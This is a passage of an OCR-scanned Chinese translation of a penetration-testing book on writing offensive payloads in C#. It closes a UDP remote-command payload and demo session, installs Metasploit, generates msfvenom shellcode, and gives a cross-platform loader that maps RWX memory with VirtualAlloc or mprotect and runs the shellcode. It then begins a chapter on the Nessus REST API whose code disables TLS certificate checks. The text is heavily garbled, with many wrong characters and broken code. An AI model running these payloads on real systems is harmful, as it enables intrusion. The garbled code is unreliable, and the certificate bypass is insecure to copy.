到 从 目标 接收 到 命令 输出 ， 此 时 Encoding.AsCll.Getstring () 将 接收 到 的 字 忆 转换 为 一 个 字符 串 ， 然 后 写 入 攻击 者 的 控制 合 。 


如 果 友 生 钳 误 ， 我 们 会 在 屏 帮 上 打印 一 个 异 音 消 息 。 


如 清单 4-16 所 示 ， 在 远程 机 器 上 启动 有 效 载荷 之 后 ， 将 4444 作 为 唯一 的 参数 传递 给 有 效 载荷 并 在 攻击 者 机 器 上 启动 接收 
器 ， 我 们 应 该 能 够 执行 命令 并 从 目标 接收 输出 。 


清单 4-16: 通过 UDP 与 目标 机 器 进行 通信 ， 以 便 运行 任意 命令 


$ /tmp/attacker.exe 192.168.1.31 4444 

Enter command to send, or a blank line to quit 
whoami 

bperry 

pwd 

/tmp 

uname 

Linux 


4.4 ”从 CC# 中 运行 X86 和 x86-64Metasploit 有 戏 载 何 


由 HD Moore 友 起 的 现在 由 Rapid7 开 上 友 的 Metasploit Framework 漏 洞 利用 开 友 工具 集 已 经 成 为 安全 专业 人 员 事 实 上 的 渗透 
测试 和 漏洞 利用 开发 框架 。 由 于 它 是 用 Ruby 编 写 的 ， 所 以 Metasploit 是 跨 平台 的 ， 将 运行 在 Linux、Windows、OS X 和 其 他 一 
系列 操作 系统 上 。 在 撰写 本 书 时 ， 有 利用 Ruby 编 程 语言 编写 的 超过 1300 个 免费 的 Metasploit 漏 洞 利用 .。 


除了 收集 漏洞 之 外 ，Metasploit 还 包含 许多 库 ， 叶 在 使 漏洞 利用 开发 快速 简单 。 例 如 ， 如 你 即将 看 到 的 那样 ， 你 可 以 使 用 
Metasploit 人 创建 一 个 跨 平台 .NET 程 序 集 来 检测 你 的 操作 系统 类 型 和 体系 结构 ， 并 针对 它 运 行 shellcode。 


4.4.1 安 半 Metasploit 
在 撰写 本 书 时 ，Rapid7 在 GitHub. 上 开发 Metasploit (https://github.com/rapid7/metasploit-framework/) 。 在 
Ubuntu 上 ， 使 用 git 将 主 Metasploit 存 储 库 克隆 到 系统 中 ， 如 清单 4-17 所 示 。 


清单 4-17: 安 六 git 并 克隆 Metasploit Framework 


$ sudo apt-get install git 
$ git clone https://github.com/rapid7/metasploit-framework.git 


注意 : 在 本 章 开 发 下 一 个 有 效 载荷 时 ， 我 建议 使 用 Ubuntu。 当 然 ， 还 需要 在 Windows 上 进行 测试 ， 以 确保 你 的 操作 系统 能 识 
别 Metasploit 并 且 有 效 载 荷 在 两 个 平台 上 均 可 工作 。 
安装 Ruby 


Metasploit 框 架 需 要 Ruby。 在 线 阅 读 Metasploit 安 六 说 明之 后 ， 如 果 你 友 现 需要 在 Linux 系 统 上 安 涂 不 同 版 本 的 Ruby， 请 
使 用 RVM (Ruby Version Manager，Ruby 版 本 管理 器 ) (http://rvm.io/) 将 其 与 现 有 Ruby 版 本 一 起 安装 。 安 装 RVM 维 护 者 
的 GNU Privacy Guard (GPG) 密 钥 ， 然 后 在 Ubuntu 上 安 沪 RVM， 如 清单 4-18 所 示 。 


清单 4-18: 安装 RVM 


$ curl -sSL https://rvm.io/mpapis.asc | gpg --import - 
$ curl -sSL https://get.rvm.io | bash -s stable 


一 旦 安装 RVM ， 通 过 查看 Metasploit 框 架 根 目录 下 的 .ruby-version 确 定 Metasploit 框 架 所 需 的 Ruby 版 本 ， 如 清单 4-19 所 


泵 。 
清单 4-19: 在 Metasploit 框 以 的 根 目 录 中 打印 .ruby_version 的 内 容 


$ cd metasploit-framework/ 
$ cat .ruby-version 
Zs 


现在 运行 rvm 命 令 来 编译 和 安 委 正确 的 Ruby 版 本 ， 如 清单 4-20 所 示 。 这 可 能 需要 几 分 钟 ， 具 体 取决 于 网 速 和 CPU 运行 速 


清单 4-20: 安装 Metasploit 所 需 的 Ruby 版 本 


$ rvm install 2.x 


一 旦 你 的 Ruby 安 装 完成 ， 请 设置 你 的 bash 环 境 以 查看 它 ， 如 清单 4-21 所 示 。 


清单 4-21: 将 安装 的 Ruby 版 本 设置 为 默认 值 
$ rvm Use 2.x 


安装 Metasploit 依 赖 


Metasploit 使 用 bundler gem (一 个 Ruby 包 ) 来 管理 依赖 天 系 。 切 换 到 你 机 器 上 当前 的 Metasploit Framework git 
checkout 目 录 ， 并 运行 如 清单 4-22 所 示 的 命令 以 安 洲 Metasploit 框 架构 建 一 些 gem 所 需 的 开 友 库 。 


清单 4-22: 安装 Metasploit 依 赖 


$ cd metasploit-framework/ 

$ sudo apt-get install libpq-dev libpcap-dev libxslt-dev 
$ gem install bundler 

$ bundle install 


一 旦 安 污 了 所 有 的 依赖 项 ， 束 可 以 局 动 Metasploit 框 架 ， 如 清单 4-23 所 示 。 
清单 4-23: 成 功 启动 Metasploit 


$ ./msfconsole -q 
msf > 


随 着 msfconsole 成 功 启 动 ， 我 们 可 以 开始 使 用 框架 中 的 其 他 工具 来 生成 有 效 载 信 。 


4.4.2 ”生成 有 效 载 何 


我 们 将 使 用 Metasploit 工 具 msfvenom 来 生成 原始 的 程序 集 有 效 载 傈 以 在 Windows 上 打开 程序 或 在 Linux 上 运行 命令 。 例 
如 ， 清 单 4-24 显 示 了 发 送 到 msfvenom 的 命令 如 何 为 Windows 生 成 一 个 x86-64 (64 位 ) 的 在 当前 显示 的 桌面 上 弹出 
calc.exe (Windows 计 算 器 ) 的 有 效 载荷 。 (要 查看 msfvenom 工 具 的 完整 选项 列表 ， 请 从 命令 行 运行 msfvenom--help。) 


清单 4-24: 运行 msfvenom 以 生成 运行 calc exe 的 原始 Windows 有 效 载 从 


$ ./msfvenom -p windows/x64/exec -f csharp CMD=calc.exe 

No platform was selected, choosing Msf::Module::Platform: :Windows from the payload 
No Arch selected, selecting Arch: x86 64 from the payload 

No encoder or badchars specified, outputting raw payload 

byte[] buf = new byte[276] { 

Oxfc ,Ox48,0x83,0xe4,0xf0,0xe8,0xc0O,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 
--SNhip-- 

Ox63,0x2e,0x65,0x78,0x65,0x00 }; 


这 里 我 们 传递 windows/x64/exec 作 为 有 效 载 位，csharp 作 为 有 效 载 位 格 式 ， 以 及 有 效 载 从 选项 CMD=calc.exe。 你 也 可 能 
会 传递 一 些 像 linux/x86/exec 与 CMD=whoami 一 样 的 东西 以 生成 一 个 在 32 位 Linux 系 统 上 运行 命令 whoami 的 有 效 载 从 。 


4.4.3 ”执行 本 机 Windows 有 效 载 位 作为 Ht 管 代码 


Metasploit 有 效 载 何以 32 位 或 64 位 程序 集 代 码 的 形式 生成 ， 在 .NET 世 界 中 称 为 非 托管 代码 。 当 你 将 C# 代 码 编译 为 DLL 或 可 
执行 程序 集 时 ， 该 代码 被 称 为 托管 代码 。 两 者 之 间 的 区 别 在 于 托管 代码 需要 .NET 或 Mono 虚 拟 机 才能 运行 ， 而 非 托管 代码 可 以 
由 操作 系统 直接 运行 。 


要 在 托管 环境 中 执行 非 托 管 程 序 集 代码 ， 可 使 用 .NET 的 P/Invoke 从 Microsoft Windowskernel32.dll 导 入 并 运行 
VirtualAlloc () 函数 。 这 允许 我 们 分 配 所 需 的 可 读 、 可 写 和 可 执行 的 内 存 ， 如 清单 4-25 所 示 。 


清单 4-25: 导入 kernel32.dll 中 的 VirtualAlloc () 函数 并 定义 Windows 特 定 代理 


class MainClass 


[@DllImport ("kernel32")| 
static extern IntPtr @VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode); 


[@UnmanagedFunctionPointer(CallingConvention.StdCall)]| 
delegate void @WindowsRun(); 


从 Kernel32.dll 导 入 VirtualAlloc () 。VirtualAlloc () 冰 数 授 受 四 个 类 型 为 IntPtr 的 参数 ，IntPtr 是 一 个 使 托管 和 非 托 管 
代码 之 间 的 数据 传递 更 简单 的 C# 类 。 在 @ 使 用 C# 属 性 DlllImport (一 个 属性 融 像 Java 中 的 注解 或 Python 中 的 一 个 委 饰 器 ) 来 告 
知 虚 拟 机 在 运行 时 在 kernel32.dll 库 中 查找 这 个 函数 。 (在 执行 Linux 有 效 载荷 时 ， 我 们 将 使 用 Dlllmport 属 性 从 libc 导 入 函数 。 

) QQ 声明 委托 WindowsRun () ， 它 具有 一 个 UnmanagedFunction-Pointer 属 性 @)， 该 属性 告诉 Mono/.NET 虚 拟 机 将 此 委托 
运行 为 非 托 管 疯 数 。 通 过 将 CallingConvention.StdCall 传 递 给 UnmanagedFunctionPointer 属 性 ， 告 知 Mono/.NET 虚 拟 机 使 
用 Windows 调 用 约定 StdCall 调 用 VirtualAlloc () 。 


首先 ， 需 要 编写 一 个 Main () 方法 来 根据 目标 系统 架构 执行 有 效 载 位 ， 如 清单 4-26 所 示 。 


清单 4-26: 包含 两 个 Metasploit 有 效 载 荷 的 C# 类 


public static void Main(string[] args ) 


OperatingSystem os = @Environment.O0SVersion; 
bool x86 = @(IntPptr.Size == 4); 
byte[ | payload; 


if (os.Platform == @PlatformID.Win32Windows || os.Platform == PlatformID.Win32NT) 


if (!x86) 

payload = new byte[ | { [... FULL x86-64 PAYLOAD HERE ...|] }; 
else 

payload = new byte[| { [... FULL x86 PAYLOAD HERE ...|] }; 


IntPtr ptr = @VirtualAlloc(IntPtr.Zero, (IntPtr)payload.Length, (IntPtr)Ox1000, (IntPtr)Ox40) 
@Marshal.Copy(payload, 0, ptr, payload.Length); 
WindowsRun r = (WindowsRun)@Marshal.GetDelegateForFunctionPointer(ptr, typeof(WindowsRun)); 
r(); 
} 
} 


我 们 获取 变量 Environment.OSVersion@ 以 确定 目标 操作 系统 ， 它 具有 一 个 Platform 属性 ， 用 于 标识 当前 系统 (如 在 if 语 句 
中 使 用 的 ) 。 为 了 确定 目标 架构 ,我们 将 IntPtr 的 大 小 与 4®@ 进 行 比 较 ， 因 为 在 32 位 系统 上 一 个 指针 大 小 是 4 个 字 节 ， 但 在 64 位 
系统 上 是 8 个 字 节 。 如 果 IntPtr 的 大 小 是 4， 那 么 我 们 处 于 一 个 32 位 的 系统 ， 否 则 假设 系统 是 64 位 的 。 我 们 还 声明 一 个 名 为 
payload 的 字 节 数组 来 保存 生成 的 有 效 载 丛 。 


现在 可 以 设置 我 们 的 本 机 程序 集 有 效 载 何 。 如 果 当 前 的 操作 系统 与 Windows PlatformlDG) (已 知 平台 和 操作 系统 版 本 的 列 
表 ) 相 匹 配 ， 则 会 根据 系统 的 体系 结构 将 一 个 字 世 数组 分 配给 payload 变 量 。 


要 分 配 执行 原始 程序 集 代码 所 需 的 内 存 ， 我 们 将 四 个 参数 传递 给 VirtualAlloc () @。 第 一 个 参数 是 IntPtr.Zero， 它 告诉 
VirtualAlloc () 在 第 一 个 可 行 的 位 置 分 配 内 存 。 第 二 个 参数 是 要 分 配 的 内 存量 ， 这 将 等 于 当前 有 效 载 答 的 长 度 。 该 参数 被 转换 
为 非 托管 函数 理解 的 IntPtr 类 ， 以 便 它 能 够 为 我 们 的 有 效 载 从 分配 足 够 的 内 存 。 


第 三 个 参数 是 在 kernel32.dll 中 定义 的 映射 到 MEM COMMIT 选 项 的 魔术 值 ， 告 诉 VirtualAlloc () 立即 分 配 内 存 。 这 个 参 
数 设置 了 应 该 分 配 内 存 的 模式 。 最 后 ，0x40 是 一 个 由 kernel32.dll 定 义 的 魔术 值 ， 它 映射 到 我 们 想 要 的 RWX ( 读 、 写 和 执行 ) 模 
式 。Virtual-Alloc () 遂 数 将 返回 一 个 指向 我 们 新 分 配 的 内 存 的 措 针 ， 所 以 我 们 知道 分 配 的 内 存 区 域 是 从 哪里 开始 的 。 


现在 ，Marshal.Copy () @ 将 我 们 的 有 效 载 伍 直接 复制 到 分 配 的 内 存 空间 中 。 传 递 给 Marshal.Copy() 的 第 一 个 参数 是 我 
们 要 复制 到 分 配 的 内 仓 中 的 字 节 数组 。 第 二 个 是 开始 复制 的 字 节 数组 中 的 率 引 ， 第 三 个 是 开始 复制 的 位 置 (使 用 
VirtualAlloc () 函数 返回 的 指针 ) 。 最 后 一 个 参数 是 从 我 们 要 把 字 书 数组 中 的 多 少 字 市 复制 到 分 配 的 内 存 中 (全 部 ) 。 


接 下 来 ， 使 用 我 们 在 MainClass 顶 部 定义 的 WindowsRun 委 托 ， 将 程序 集 代码 引用 为 非 托管 函数 指针 。 使 用 
Marshal.GetDelegateForFunctionPointer () 方法 @ 通 过 传递 指向 程序 集 代码 开头 的 指针 和 委托 类 型 分 别 作为 第 一 个 参数 和 
第 二 个 参数 来 创建 一 个 新 的 委托 。 我 们 将 此 方法 返回 的 委托 转换 为 WindowsRun 委 托 类 型 ， 然 后 将 其 分 配给 同一 WindowsRun 
类 型 的 新 变量 。 现 在 剩 下 的 就 是 像 函数 一 样 调用 这 个 代理 执行 我 们 复制 到 内 存 中 的 程序 集 代码 。 


4.4.4 执行 本 机 Linux 有 效 载 何 


在 本 节 中 ， 我 们 将 介绍 如 何 编写 可 以 编译 之 后 立即 在 Linux 和 Windows 上 运行 的 有 效 载荷 。 但 是 首先 需要 从 libc 导 入 一 些 函 


数 并 定义 我 们 的 Linux 非 托管 函数 委托 ， 如 清单 4-27 所 示 。 
清单 4-27: 设置 有 效 载 伍 以 运行 生成 的 Metasploit 有 效 载 丛 


[DllImport("libc")|] 
static extern IntPtr mprotect(IntPtr ptr, IntPptr length, IntPptr protection); 


[DllImport("libc")] 
static extern IntPtr posix memalign(ref IntPtr ptr, IntPptr alignment, IntPtr size); 


[DllImport("libc")] 
static extern void free(IntPtr ptr); 


[UnmanagedFunctionPointer(@CallingConvention.Cdec]l)| 
delegate void @LinuxRun(); 


我 们 在 MainClass 栅 部 Windows 水 数 导 入 附近 添加 如 清单 4-27 所 示 的 行 。 我 们 从 libc 导 入 三 个 遂 数 
posix memalign () 和 free () ， 并 且 定 义 一 个 名 为 LinuxRun 的 新 委托 。 它 有 一 个 UnmanagedFunctionPointer 属 性 ,就 
像 我 们 的 WindowsRun 委 托 一 样 。 但 是 与 我 们 在 清单 4-25 中 所 传递 的 CallingConvention.StdCall 不 同 ， 传 递 Calling- 
Convention.CdeclQq)， 因 为 cdedl 是 类 Unix 环 境 中 本 机 孙 数 的 调用 约定 。 


mprotect () 、 


如 清单 4-28 所 示 ， 我 们 在 Main () 万 法 中 添加 一 个 else if 语句 ， 用 if 语句 测试 我 们 是 否 在 Windows 机 器 上 (参见 清单 4- 
<6G)) 。 


清单 4-28: 检测 平台 并 分 配 相 应 的 有 效 载荷 
else if ((int)os.Platform == 4 || (int)os.Platform == 6 || (int)os.Platform == 128) 


if C1x86) 

payload = new byte[] { [... X86-64 LINUX PAYLOAD GOES HERE ...|] }; 
else 

payload = new byte[] { [... X86 LINUX PAYLOAD GOES HERE ...] }; 


来 自 Microsoft 的 原始 PlatformlD 枚 举 不 包括 非 Windows 平 台 的 值 。Mono3 引 入 了 非 官 方 的 类 Unix 系 统 的 Platform 属 性 ， 
所 以 我 们 直接 比较 Platform 的 值 和 魔术 值 。 整 数值 4.6 和 128 可 用 于 确定 我 们 是 否 运 行 在 类 Unix 系 统 上 。 将 Platform 属 性 转换 为 
int 可 以 将 Platform 值 与 整数 值 4.16 和 128 进 行 比较 。 


一 旦 确定 我 们 运行 在 类 Unix 系 统 上 ， 便 可 以 设置 需要 的 值 来 执行 本 机 程序 集 有 效 载 何 。 根 据 当 前 的 架构 ， 有 效 载 傈 字 忆 数 
组 将 被 分 配 到 x86 或 X86-64 有 效 载 何 。 


分 配 内 存 
现在 我 们 开始 分 配 内 存 将 程序 集 插入 到 内 存 中 ， 如 清 蛙 4-29 所 示 。 


清单 4-29: 使 用 posix memalign () 分 配 内 存 


LIEPRTT PT 三 LITCEET ZeIO， 
IntpPtTr success = IntPptr.Zero; 
bool freeMe = false; 
try 
{ 
int pagesize = 4096; 
Intptr length = (IntPtr)payload.Length; 
success = @posix memalign(ref ptr, (IntPtr)32, length); 


if (success != IntPtr.Zero) 

{ 
Console.WriteLine("Bail! memalign failed: ”+ success); 
return; 

} 


首先 ， 我 们 定义 了 一 些 变量 : ptr， 如 果 一 切 顺 利 应 该 指定 为 posix_memalign () 分 配给 内 存 的 开头 ; success， 如 果 分 配 
成 功 应 该 指定 为 由 posix memalign () 返回 的 值 ; 布尔 值 fFee Me， 当 分 配 成 功 时 为 true， 以 便 我 们 知道 何 时 需要 释放 分 配 的 内 
存 。 (分 配 失 败 将 freeMe 赋 值 为 false) 。 


接 下 来 ,我们 局 动 一 个 try 块 来 开始 分 配 以 捕获 任何 异常 并 在 友 生 错误 时 正常 地 退出 有 效 载 傈 。 我 们 将 一 个 名 为 pagesize 的 
新 变量 设置 为 4096， 这 等 于 大 多 数 Linux 系 统 安装 时 的 默认 内 存 页 大 小 。 


在 分 配 一 个 称 为 length 的 新 变量 (包含 有 效 载 荷 转换 为 IntPtr 的 长 度 ) 后 ， 通 过 引用 传递 ptr 变 量 来 调用 
posix memalign () @@， 以 便 posix_memalign () 可 以 直接 改变 该 值 而 不 必 将 其 传递 回来 。 我 们 还 传递 内 存 对 齐 的 值 (总 是 2 
的 倍数 ，32 是 一 个 很 好 的 值 ) 和 要 分 配 的 内 存量 。 如 果 分 配 成 功 ，posix_ memalign () 立 数 将 返回 IntPtr.Zero， 所 以 我 们 会 检 
查 它 。 如 果 没 有 返回 IntPtr.Zero， 则 打印 一 条 有 关 posix_ memalign () 失败 的 消息 ， 然 后 返回 并 退出 有 效 载 何 。 如 果 分 配 成 
功 ， 则 将 分 配 的 内 存 模式 更 改 为 可 读 可 写 可 执行 ， 如 清单 4-30 所 示 。 


清单 4-30: 更 改 分 配 的 内 存 模式 


freeMe = true; 

IntPtr alignedPtr = @(Intptr)((int)ptr & ~(pagesize - 1)); //get page boundary 
IntPtr @mode = (IntPtr)(Ox04 | Ox02 | Ox01); //RWX -- careful of selinux 
success = @mprotect(alignedPptr, (IntPptr)32, mode); 


if (Success != IntPtr.Zero) 

{ 
Console.WriteLine("Bail! mprotect failed"); 
return; 

} 


注意 : 这 里 用 于 在 Linux 上 实现 shellcode 执 行 的 技术 将 无 法 在 限制 RWX 内 存 分 配 的 操作 系统 上 运行 。 例 如 ， 如 果 你 的 Linux 发 


行 版 正在 运行 SELinux， 则 这 些 示 例 可 能 无 法 在 你 的 计算 机 上 运行 。 此 ， 我 推荐 Ubuntu 


为 Ubuntu 不 存在 SELinux， 运 行 这 


此 示例 应 该 没有 问题 。 


为 了 确保 稍 后 释放 分 配 的 内 存 ， 我 们 将 freeMe 设 置 为 true。 接 下 来 ， 将 使 用 posix memalign () 在 分 配 中 设置 的 指针 
(ptr 变 量 ) ， 通 过 将 指针 和 pagesize 的 补 码 执行 按 位 与 运算 得 到 我 们 分 配 的 页 面 对 齐 的 内 存 空间 @， 用 它 创建 一 个 页 面 对 齐 的 
中 针 。 实质 上 上， 这些 补 码 将 我 们 的 指针 地 址 变 为 负数 以 设置 内 存 权限 。 


基于 Linux 在 页 面 中 分 配 内 存 的 万 式 ， 我 们 必须 更 改 分 配 了 有 效 载体 的 整个 内 存 页 的 模式 。 与 当前 pagesize 的 补 码 的 按 位 与 
会 将 posix_memalign() 提供 给 我 们 的 内 存 地 址 向 下 舍 入 到 指针 所 在 的 内 存 页 面 的 开头 。 这 人 允许 我 们 设置 由 
posix_memalign () 分 配 的 内 存 的 完整 内 存 页 面 的 模式 。 


我 们 还 创建 了 通过 对 0x04 ( 读 ) 、0x02 ( 写 ) 和 0x01 (执行 ) 执行 或 操作 来 设置 内 存 的 模式 ， 并 将 来 自 或 运算 的 值 存储 在 
mode 变 量 @O 中 。 最 后 ， 通 过 传递 对 齐 的 内 和 存 页 面 指 针 ， 设 置 的 内 人 存 区 域 的 长 度 (与 传递 给 posix memalign () 水 数 的 一 样 ) 
以 及 将 内 存 设置 的 模式 来 调用 mprotect () @。 像 posix memalign () 函数 一 样 ， 如 果 mprotect () 成 功 地 更 改 了 内 存 页 的 
模式 ， 则 返回 IntPtr.Zero。 如 果 未 返回 IntPtr.Zero， 则 打印 错误 消息 并 返回 以 退出 有 效 载 稚 。 


复制 和 执行 有 效 载 从 
我 们 现在 已 经 准备 好 将 有 效 载 集 复制 到 内 存 空间 并 执行 代码 ， 如 清单 4-31 所 示 。 
清单 4-31: 将 有 效 载荷 复制 到 分 配 的 内 存 并 执行 


@Marshal.Copy(payload, 0, ptr, payload.Length); 
LinuxRun r = (LinuxRun)@Marshal.GetDelegateForFunctionPpointer(ptr, typeof(LinuxRun)); 
r(); 


} 
finally 


if (freeMe) 
@free(ptr); 
} 


清单 4-31 的 最 后 几 行 类 似 于 我 们 为 执行 Windows 有 效 载 丛 而 编写 的 代码 ( 见 清单 4-26) 。Marshal.Copy () 方法 @ 将 有 
效 载 全 复制 到 分 配 的 内 存 组 ;中 区 中 ，Marshal.Get-DelegateForFunctionPointer () 方法 @ 将 内 存 中 的 有 效 载 集 转换 为 可 以 从 
托管 代码 调用 的 代理 。 一 旦 获得 一 个 指向 内 存 中 的 代码 的 代理 ， 我 们 就 调用 它 以 执行 代码 。 如 果 freeMe 设 置 为 true@)， 则 try 块 
后 面 的 finally 块 会 释放 由 posix_memalign () 分 配 的 内 存 。 


最 后 ,我 们 将 生成 的 Windows 和 和 Linux 有 效 载 傈 添加 到 跨 平 台 有 效 载 伍 中 ， 这 样 我 们 可 以 在 Windows 或 Linux 上 编译 和 运行 
相同 的 有 效 载 傈 。 


4.5 ”本章 小 结 


在 本 章 中 ， 我 们 讨论 了 几 种 在 各 种 情况 下 创建 有 用 的 目 定义 有 效 载 傈 的 方法 。 


使 用 TCP 的 有 效 载 倚 在 你 从 内 网 获取 shell 以 维持 持久 性 时 有 显明 优势 。 使 用 回 连 技术 ， 你 可 以 远程 实现 一 个 shell 从 而 协助 
网 络 钓鱼 活动 ， 例 如 ， 渗 透 测试 者 完全 在 网 络 外 部 。 另 一 方面 ， 如 果 能 访问 内 部 网 络 ， 绑 定 扩 术 可 以 帮助 你 维护 持久 性 而 无 顷 再 
次 利用 计算 机 上 的 漏洞 。 


通过 UDP 进 行 通信 的 有 效 载 傈 通常 可 以 绕 过 配置 不 当 的 防火 墙 ， 并且 可 能 绕 过 一 个 专注 于 TCP 流 量 的 入 侵 检 测 系 统 。 昌 然 
UDPECTCP 更 不 可 靠 ,但 UDP 提 供 了 严格 审查 的 TCP 通 弟 无 法 提供 的 速度 和 隐 阅 性 。 通 过 使 用 监听 传 入 广播 的 UDP 有 效 载体 ， 
尝试 执行 友 送 的 命令 ,然后 将 结果 广播 回来 ， 攻 击 可 能 会 更 安静 、 更 隐 汕 ， 但 是 会 牺牲 一 定 的 稳定 性 。 


Metasploit 人 允许 攻击 者 创建 许多 类 型 的 有 效 载 傈 ， 并 且 易 于 安装 和 运行 。Metasploit 包 括 msfvenom 工 具 ， 它 可 以 创建 和 
编码 用 于 漏洞 利用 的 有 效 载 倚 。 使 用 msfvenom 工 具 生 成 本 机 程序 集 有 效 载 荷 ， 你 可 以 构建 一 个 小 型 的 跨 平台 可 执行 文件 以 检测 
和 运行 各 种 操作 系统 的 shellcode。 在 目标 上 运行 有 效 载 答 会 具有 很 好 的 灵活 性 。 


第 5 章 ”上 自动 化 运行 Nessus 


Nessus 是 一 个 沅 行 的 强大 的 漏洞 扫 摘 程序 ， 它 使 用 已 知 漏洞 的 数据 库 来 评估 网 络 上 的 给 定 系 统 是 否 缺 少 补丁 或 易 受 已 知 漏 
洞 的 攻击 。 本 章 将 展示 如 何 编写 类 与 Nessus API 进 行 交 互 以 自动 化 ， 配 置 和 运行 漏洞 扫描 。 


Nessus 最 初 是 开源 的 ， 但 在 2005 年 被 Tenable Network Security 购 买 后 惑 闭 源 了 。 在 撰写 本 书 时 ，Tenable 为 Nessuas 
Professional 提 供 了 为 期 7 天 的 试用 版 和 称 为 Nessus Home 的 限制 版 。 两 者 之 间 最 大 的 区 别 在 于 ，Nessus Home 一 次 只 能 扫 搞 
16 个 IP 地 址 ， 但 对 你 来 说 应 该 足以 运行 本 草 中 的 示例 并 熟悉 它 了 。Nessus 在 帮助 扫 接 和 管理 其 他 公司 网 络 的 专业 人 士 之 间 非 常 
受 欢 迎 。 按 照 Tenable 风 WH 站 https://www.tenable.com/products/nessus-home/ 上 的 说 明 安 装 和 配置 Nessus Home。 


许多 组 织 需 要 定期 进行 漏洞 和 补丁 扫 摘 ， 以 便 管 理 和 识别 其 网 络 上 的 风险 以 及 合 规 性 。 使 用 Nessus 来 完成 通过 编写 程序 来 
帮助 我 们 对 网 络 上 的 主机 执行 未 经 身份 认证 的 漏洞 扫 摘 。 


5.1 REST 和 Nessus API 


Web 应 用 程序 和 和 API 的 出 现 兴起 了 称 为 REST API 的 API 架 构 。REST (representationalstate transfer， 代 表 性 状态 传输 ) 
通 单 是 使 用 各 种 HTTP 方 法 (GET、POST、DELETE 和 PUT) 访问 服务 器 上 的 资源 〈 如 用 户 账 户 ) 或 与 其 交互 〈 如 漏洞 扫 摘 ) 的 
一 种 万 式 。HTTP 方 法 描述 了 我 们 在 进行 HTTP 请 求 时 的 意图 (例如 我 们 要 创建 或 修改 一 个 资源 ) ， 类 似 于 数据 库 中 的 
CRUD (Create、Read、Update、Delete、 创 建 、 读 取 、 更 新 、 删 除 ) 操作 。 


例如 ， 查 看 以 下 简单 的 GET HTTP 请 求 ， 束 和 像 数据 库 的 读 取 操作 (SELECT*FROM users WHERE id=1) : 


GET /users/@1 HTTIP/1.0 
Host: 192.168.0.11 


在 此 示例 中 ， 我 们 正在 请 求 ID 为 1 的 用 户 的 信息 。 要 获取 其 他 ID 的 用 户 的 信息 ， 你 可 以 使 用 该 用 户 的 ID 蔡 换 URI 末 尾 的 1@。 


要 更 新 第 一 个 用 户 的 信息 ，HTTP 请 求 可 能 如 下 代码 所 示 : 


POST /users/1 HTTP/1.0 

Host: 192.168.0.11 
Content-Type: application/]Json 
Content-Length: 24 


"name": “Brandon Perry"} 


在 我 们 假设 的 RESTful API 中 ， 上 述 POST 请 求 会 将 第 一 个 用 户 的 名 字 更 新 为 BrandonPerry。 通 党 ，POST 请 求 用 于 更 新 
Web 服 务 器 上 的 资源 。 


要 完全 删除 账户 ， 请 使 用 DELETE， 如 下 代码 所 示 : 


DELETE /users/1 HTTP/1.0 
Host: 192.168.0.11 


Nessus API 与 乙 类 似 。 在 使 用 API 时 ， 我 们 将 向 服务 器 友 送 JSON 并 从 服务 器 接收 JSJON ， 就 像 这 些 例 子 一 样 。 本 章 中 编写 的 
类 目 在 处 理 与 REST API 进 行 通信 和 交互 的 方式 。 


安装 了 Nessus 就 可 以 在 https://<IP address>:8834/api 上 找到 Nessus REST API 文 档 。 我 们 仅 介绍 一 些 用 于 让 Nessus 执 行 
漏洞 扫 摘 的 核心 API。 


5.2 Nessus9esslon 关 


为 了 目 动 友 送 命令 和 从 Nessus 接 收 啊 应 ， 我 们 将 使 用 Nessus9ession 类 创建 一 个 会 话 并 执行 API 命 令 ， 如 清单 -1 所 示 。 


清单 5-1: NessusSession 类 开头 的 构造 为数 和 Authenticate () 方法 


public class NessusSession : @IDisposabjle 


L 


public @NessusSession(string host, string username, string password) 


L 


ServicePointManager.ServerCertificateValidationCallback = 
(Object obj, X509Certificate certificate, X509Chain chain, SslPolicyErrors errors) => true; 


this.Host = 四 host ; 


if (@!Authenticate(username, password)) 
throw new Exception("Authentication failed"); 
} 


public bool ©@Authenticate(string username, string password) 


lI 
JObject obj = @new JObject(); 


obj["username" | = username; 
obj["password" | = password; 


JObject ret = @MakeRequest(WebRequestMethods.Http.Post, "/session", obj); 


if (ret ["token"| == null) 
return false; 


this.@Token = ret["token" |.Value<string>(); 
this.Authenticated = true; 


return true; 


} 


如 清单 ?5-1 所 示 ， 此 类 实现 了 IDisposable 接 口 @@， 以 便 我 们 可 以 在 using 语 句 中 使 用 NessusS9ession 类 。 你 可 能 记得 前 几 章 
中 IDisposable 接 口 允许 我 们 通过 调用 Dispose () 来 自动 清理 与 Nessus 的 会 话 ， 当 我 们 在 ee 
实例 化 的 类 时 会 尽快 实现 它 。 


在 @ 处 ， 我 们 将 Host 属 性 赋值 为 传递 给 NessusS9ession 构 造 国 数 @ 的 host 参 数 ， 然 后 蔡 试 进行 身份 认证 @@， 因 为 任何 后 续 
的 API 调 用 都 需要 经 过 身份 认证 的 会 话 。 如 果 身 份 认证 失败 ， 我 们 会 抛 出 异 单 并 打印 Authentication failed 和 警报。 如果 身 份 认证 
成 功 ， 我 们 将 存储 API 密 钥 供 以 后 使 用 。 


在 Authenticate () 方法 @ 中 ， 我 们 创建 了 一 个 JObject@ 来 保存 作为 参数 传 入 的 凭据 。 我 们 将 传递 HTTP 方 法 ， 目 标 主 机 
的 URI 和 JObject 作 为 参数 调用 MakeRequest () 方法 @ (随后 讨论 )  。 如 果 认 证 成 功 ， 则 MakeRequest () 应 返回 具有 认证 
令 脾 的 JObject; 如 果 认 证 失败 ， 它 应 该 返回 一 个 空 的 JObject。 


当 我 们 收 到 认证 令 牌 时 ， 我 们 将 其 值 分 配给 Token 属 性 @， 将 Authenticated 属 性 设置 为 true， 并 返回 true 以 告知 程序 员 认 
证 成 功 。 如 果 身 份 认 证 失败 ， 我 们 返回 false。 


5.2.1 ”发运 HTTP 请 求 


MakeRequest () 方法 发 出 实际 的 HTTP 请 求 并 返回 响应 ， 如 清单 5-2 所 示 。 


清单 5-2: NessusSession 类 的 MakeRequest () 方法 


public JObject MakeRequest(string method, string uri, @JjJObject data = null, string token = null) 


L 
string url = @"https://" + this.Host + ":8834" + Uri; 
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(ur]l); 
request.@Method = method; 


if (!string.IsNullOrEmpty(token)) 
request.Headers ["X-Cookie"|] = @"token=" + token; 


request.@ContentType = “application/json'; 
if (data != null) 


byte[] bytes = System.Text.Encoding.ASCII.@GCetBytes(data.ToString()); 
request.ContentLength = bytes.Length ; 
